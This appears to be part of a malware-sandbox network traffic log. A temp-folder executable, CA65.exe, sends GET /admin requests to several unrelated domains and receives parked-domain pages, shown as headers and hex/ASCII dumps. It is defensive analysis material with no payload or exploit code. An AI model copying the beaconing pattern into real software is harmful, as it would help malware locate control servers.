action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHe
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 Data Ascii: tatic.HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6f 70 3a 30 70 78 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e Data Ascii: op:0px;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.pn
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 Data Ascii: ex;">Processing<div class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 3d 22 6c 69 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 Data Ascii: ="link dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6d 65 22 3e 56 69 78 65 6a 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 30 38 2e 31 33 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 Data Ascii: me">Vixej.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$4,995</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$4,995</span> or pay <span class="green">$208.13</span> per mont
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 Data Ascii: -bottom:25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=Vixej.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10px;

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.4	53834	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	323	OUT	GET /admin HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_JekP6NopRcz0unQe+GCbv9btvSD3RF+Trql4knpE8poM/IOfAVv+vLJw8gVB5zd/aEfMdeBGFAhiKtJIPwuanw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:09 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
276	192.168.2.4	53851	13.248.169.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	333	OUT	GET /admin HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CUMjypQpkI25/kAN3X4dVwQeIDTLy3EwfI+vo7UPNL/ADH3slQvV3cOrVx4A9VYY1N7CaIPh1rqKiBw734a0qw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:09 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
277	192.168.2.4	53853	69.42.204.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	167	OUT	GET /admin HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:09 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:15:09 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
278	192.168.2.4	53850	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	321	OUT	GET /admin HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jwgMtSsz4k+BONzzjlFfzfhZp0xM9rYHYovY4f8481afqFDB0hFgGRPRXsnq1FRpSNiQQPFjZKODNAA0do1KFQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:09 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
279	192.168.2.4	54193	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	199	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	798	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eqkYC%2Fz%2BVvAg4R0KjXPXo0gKrr4Knv1hSNANOP%2Bn2FmtM%2FzxuTuDcHmZJzkIRNVSQPSt77bYdJvJ5W49323RGITsDnLneNfPbhrQOwH3pInVnX88kYkKPnOKQERaFAmVQjfCKS8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0904cfc40325-MIA
2023-12-22 20:15:09 UTC	571	IN	Data Raw: 31 61 37 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 1a7c<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 Data Ascii: /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/c
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 Data Ascii: k rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag(
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 48 65 61 64 65 72 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 Data Ascii: Header Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHe
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 Data Ascii: tatic.HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="
